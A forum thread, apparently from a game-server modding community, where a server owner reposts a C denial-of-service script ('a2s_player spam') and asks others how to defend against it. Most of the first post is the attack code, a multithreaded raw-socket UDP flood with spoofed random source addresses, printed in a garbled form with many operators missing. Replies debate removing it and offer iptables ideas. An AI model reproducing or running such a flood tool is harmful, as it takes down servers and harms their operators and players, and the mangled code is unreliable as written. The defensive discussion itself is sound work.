How to fight "a2s_player spam" script? (IP rate limit sustained)


n3tman
New Member
Join Date: Dec 2015
Old 12-13-2015 , 13:20   How to fight "a2s_player spam" script? (IP rate limit sustained)

There have been many reports from server owners experiencing "IP rate limit sustained" attacks.

Notice that they started appearing in September 2015.

I think I've found the exact script that is used by the attackers and the place where they get it from.

It was posted on "Hack Forums" on the 6th of September. It's a free registration forum, so any kid can make an account there, find this script and use it to abuse servers.

[C] Source Player Query Spam (a2s_player spam)

#include <time.h>
#include <pthread.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
 
 
#define MAX_PACKET_SIZE 4096
#define PHI 0x9e3779b9
char sourceip[17];
 
static 
uint32_t Q[4096], 362436;
 
 
struct thread_data{
        
int throttle;
        
int thread_id;
        
unsigned int floodport;
        
struct sockaddr_in sin;
};
 
 
void init_rand(uint32_t x)
{
        
int i;
        
Q[0] = x;
        
Q[1] = PHI;
        
Q[2] = PHI PHI;
 
        for (
34096i++)
                
Q[i] = Q[3] ^ Q[2] ^ PHI i;
}
 
 
uint32_t rand_cmwc(void)
{
        
uint64_t t18782LL;
        static 
uint32_t i 4095;
        
uint32_t x0xfffffffe;
        
= (1) & 4095;
        
Q[i] + c;
        
= (>> 32);
        
c;
        if (
c) {
                
x++;
                
c++;
        }
        return (
Q[i] = x);
}
 
 
char *myStrCat (char *schar *a) {
    while (*
!= '\0's++;
    while (*
!= '\0') *s++ = *a++;
    *
'\0';
    return 
s;
}
 
 
char *replStr (char *strsize_t count) {
    if (
count == 0) return NULL;
    
char *ret malloc (strlen (str) * count count);
    if (
ret == NULL) return NULL;
    *
ret '\0';
    
char *tmp myStrCat (retstr);
    while (--
count 0) {
        
tmp myStrCat (tmpstr);
    }
    return 
ret;
}
 
/* Create header checksum*/
unsigned short csum (unsigned short *bufint nwords)
{
  
unsigned long sum;
  for (
sum 0nwords 0nwords--)
  
sum += *buf++;
  
sum = (sum >> 16) + (sum 0xffff);
  
sum += (sum >> 16);
  return (
unsigned short)(~sum);
}
void setup_ip_header(struct iphdr *iph)
{
  
iph->ihl 5;
  
iph->version 4;
  
iph->tos 0;
iph->tot_len sizeof(struct iphdr) + sizeof(struct udphdr) + 9;
  
iph->id htonl(54321);
  
iph->frag_off 0;
  
iph->ttl MAXTTL;
  
iph->protocol IPPROTO_UDP;
  
iph->check 0;  
   
/* Base Address to start */
      
snprintf(sourceipsizeof(sourceip)-1"%d.%d.%d.%d"rand()%255rand()%255rand()%255rand()%255);
      
iph->saddr inet_addr(sourceip); // Holy fuck this is terrible
}
 
 
void setup_udp_header(struct udphdr *udph)
{
  
udph->source htons(27005);
  
udph->check 0;
  
char *data = (char *)udph sizeof(struct udphdr);
      
memcpy((void *)udph sizeof(struct udphdr), "\xFF\xFF\xFF\xFF\x55\x4B\xA1\xD5\x22"9);
      
udph->len=htons(sizeof(struct udphdr) + 9);
}
 
 
void *flood(void *par1)
{
  
struct thread_data *td = (struct thread_data *)par1;
  
fprintf(stdout"Thread %d started\n"td->thread_id);
  
char datagram[MAX_PACKET_SIZE];
  
struct iphdr *iph = (struct iphdr *)datagram;
  
struct udphdr *udph = (/*u_int8_t*/void *)iph sizeof(struct iphdr);
  
struct sockaddr_in sin td->sin;
  
char new_ip[sizeof "255.255.255.255"];
 
  
int s socket(PF_INETSOCK_RAWIPPROTO_TCP);
  if(
0){
    
fprintf(stderr"Could not open raw socket.\n");
    exit(-
1);
  }
  
unsigned int floodport td->floodport;
  
/* Reset data */
  
memset(datagram0MAX_PACKET_SIZE);
  
/* Set appropriate fields in headers */
  
setup_ip_header(iph);
  
setup_udp_header(udph);
  
udph->dest htons(floodport);
  
iph->daddr sin.sin_addr.s_addr;
  
iph->check csum ((unsigned short *) datagramiph->tot_len >> 1);
  
int tmp 1;
  const 
int *val = &tmp;
  if(
setsockopt(sIPPROTO_IPIP_HDRINCLvalsizeof (tmp)) < 0){
    
fprintf(stderr"Error: setsockopt() - Cannot set HDRINCL!\n");
    exit(-
1);
  }
  
int throttle td->throttle;
  
uint32_t random_num;
  
uint32_t ul_dst;
  
init_rand(time(NULL));
  if(
throttle == 0){
    while(
1){
      
sendto(sdatagramiph->tot_len0, (struct sockaddr *) &sinsizeof(sin));
      
random_num rand_cmwc();
 
      
ul_dst = (random_num >> 24 0xFF) << 24 |
               (
random_num >> 16 0xFF) << 16 |
               (
random_num >> 0xFF) << |
               (
random_num 0xFF);
      
iph->saddr ul_dst;
      
udph->source htons(random_num 0xFFFF);
      
iph->check csum ((unsigned short *) datagramiph->tot_len >> 1);
    }
  } else {
    while(
1){
      
throttle td->throttle;
      
sendto(sdatagramiph->tot_len0, (struct sockaddr *) &sinsizeof(sin));
      
random_num rand_cmwc();
      
ul_dst = (random_num >> 24 0xFF) << 24 |
               (
random_num >> 16 0xFF) << 16 |
               (
random_num >> 0xFF) << |
               (
random_num 0xFF);
      
iph->saddr ul_dst;
      
udph->source htons(random_num 0xFFFF);
      
iph->check csum ((unsigned short *) datagramiph->tot_len >> 1);
     while(--
throttle);
    }
  }
}
 
 
int main(int argcchar *argv[ ])
{
  if(
argc 5){
    
fprintf(stderr"Invalid parameters!\n");
    
fprintf(stdout"a2s_player (UDP Spoof Attack) \nUsage: %s <target IP/hostname> <port to be flooded> <throttle (lower is faster)> <number threads to use> <time (optional)>\n"argv[0]);
    exit(-
1);
  }
  
fprintf(stdout"Setting up Sockets...\n");
  
int num_threads atoi(argv[4]);
  
unsigned int floodport atoi(argv[2]);
  
pthread_t thread[num_threads];
  
struct sockaddr_in sin;
  
sin.sin_family AF_INET;
  
sin.sin_port htons(floodport);
  
sin.sin_addr.s_addr inet_addr(argv[1]);
  
struct thread_data td[num_threads];
  
int i;
  for(
0;i<num_threads;i++){
    
td[i].thread_id i;
    
td[i].sin sin;
    
td[i].floodport floodport;
    
td[i].throttle atoi(argv[3]);
    
pthread_create( &thread[i], NULL, &flood, (void *) &td[i]);
  }
  
fprintf(stdout"Starting Flood...\n");
  if(
argc 5)
  {
    
sleep(atoi(argv[5]));
  } else {
    while(
1){
      
sleep(1);
    }
  }
 
  return 
0;

So, now that we know what we are fighting with, how do we protect our servers from it? What are the possible solutions?

We need your help, dear AlliedModders masterminds!

I'm a Linux noob myself, but I will try this and that iptables guides and report here if it helps.

Last edited by n3tman; 12-13-2015 at 13:25.
Neuro Toxin
Veteran Member
Join Date: Oct 2013
Location: { closing the void; }
Old 12-13-2015 , 17:43   Re: How to fight "a2s_player spam" script? (IP rate limit sustained)

Dont post the exploit here.

U should email this directly to valve or pm senior / trusted admins on alliedmods.

Remove the code from your post. You're enabling ppl to use it.
n3tman
New Member
Join Date: Dec 2015
Old 12-13-2015 , 18:41   Re: How to fight "a2s_player spam" script? (IP rate limit sustained)

Neuro Toxin, you're right, I will try to write to CS:GO devs now, but I won't remove the code, because I want to draw more attention to it so that it can be fixed faster.

I'll let admins/moderators decide if it should be removed or not. I was hoping posting the code here would allow some cool C++ developers to help find a way to defend from it.

UPD: sent an e-mail to [email protected]. Seems like it's the only way you can report such things, because writing about it on the official CS:GO forums is useless (several scripts are already posted there). And even registration is not working.

Last edited by n3tman; 12-13-2015 at 19:10.
Puppetmaster
Senior Member
Join Date: Jun 2015
Location: Probably at a computer.
Old 12-13-2015 , 22:25   Re: How to fight "a2s_player spam" script? (IP rate limit sustained)

      snprintf(sourceipsizeof(sourceip)-1"%d.%d.%d.%d"rand()%255rand()%255rand()%255rand()%255);
      
iph->saddr inet_addr(sourceip); // Holy fuck this is terrible 
Looks like it's going to be a pain to defend against this. While it has a rotating spoof of their source address, I find it interesting that it does not call setup_ip_header more than once per thread, so it should be possible to block the IPs using iptables. Unless they restart the binary that should block them (they WILL restart eventually).

I would start by setting up a good set of iptables rules, with things like Martians dropped by default, to help slow this kind of attack down (due to the way this is coded, its spoof code allows loopbacks, Martians, etc.).

I would expect a better version to be found in the wild shortly. Off the top of my head I can see a few areas that could be easily improved to make this much more dangerous.
Neuro Toxin
Veteran Member
Join Date: Oct 2013
Location: { closing the void; }
Old 12-13-2015 , 22:15   Re: How to fight "a2s_player spam" script? (IP rate limit sustained)

Dont leave that code here. More ppl are getting it / using it. Dont make this open to public. Remove the code please.
asherkin
SourceMod Developer
Join Date: Aug 2009
Location: OnGameFrame()
Old 12-14-2015 , 02:50   Re: How to fight "a2s_player spam" script? (IP rate limit sustained)

Quote:
Originally Posted by Neuro Toxin View Post
Dont leave that code here. More ppl are getting it / using it. Dont make this open to public. Remove the code please.
Anybody with the capability of using it will already have the means to.

This isn't exactly new either; the same class of DoS attacks has been around since the first Source servers.
Last edited by asherkin; 12-14-2015 at 02:52.
veli
Senior Member
Join Date: Apr 2012
Location: Netherlands
Old 12-14-2015 , 05:16   Re: How to fight "a2s_player spam" script? (IP rate limit sustained)

My question is: how did you get that code? So I could say maybe you have used it yourself too? I had the same problem a while ago, and due to this shit my server is dead. But I did not know that it was this little shit script.

Is that an attack script? I searched the internet for many weeks and could not find out what it was. So DDoS protection is not helping either. I have been waiting more than 1 week for an answer from my host on how to fix this.

No answer yet.

I think you have to remove that shit here. There are enough crazy people who can use it.
cTmoNe
AlliedModders Donor
Join Date: Jul 2010
Location: Germany
Old 12-14-2015 , 06:44   Re: How to fight "a2s_player spam" script? (IP rate limit sustained)

Quote:
Originally Posted by veli View Post
My question is: how did you get that code? So I could say maybe you have used it yourself too? I had the same problem a while ago, and due to this shit my server is dead. But I did not know that it was this little shit script.

Is that an attack script? I searched the internet for many weeks and could not find out what it was. So DDoS protection is not helping either. I have been waiting more than 1 week for an answer from my host on how to fix this.

No answer yet.

I think you have to remove that shit here. There are enough crazy people who can use it.
Yeah, same problem with my server.


LE: With qcache_mm the server is still online, but players will see it as offline.
Last edited by cTmoNe; 12-14-2015 at 14:37.
Puppetmaster
Senior Member
Join Date: Jun 2015
Location: Probably at a computer.
Old 12-14-2015 , 17:18   Re: How to fight "a2s_player spam" script? (IP rate limit sustained)

Quote:
Originally Posted by veli View Post
My question is: how did you get that code? So I could say maybe you have used it yourself too? I had the same problem a while ago, and due to this shit my server is dead. But I did not know that it was this little shit script.

Is that an attack script? I searched the internet for many weeks and could not find out what it was. So DDoS protection is not helping either. I have been waiting more than 1 week for an answer from my host on how to fix this.

No answer yet.

I think you have to remove that shit here. There are enough crazy people who can use it.
People with the skills to compile this either already have the skills or are one step away from making their own from scratch anyway. It's not complicated code; half of the second-year students at my university could have made something like this ;)
medic917
Senior Member
Join Date: Aug 2014
Old 12-13-2015 , 23:32   Re: How to fight "a2s_player spam" script? (IP rate limit sustained)

I was attacked by a different DoS attack,
but I thought yours was interesting and decided to help.

Try this: https://forums.alliedmods.net/showpo...1&postcount=35
This apparently helps. Of course I am a complete noob so you can correct me if I'm wrong.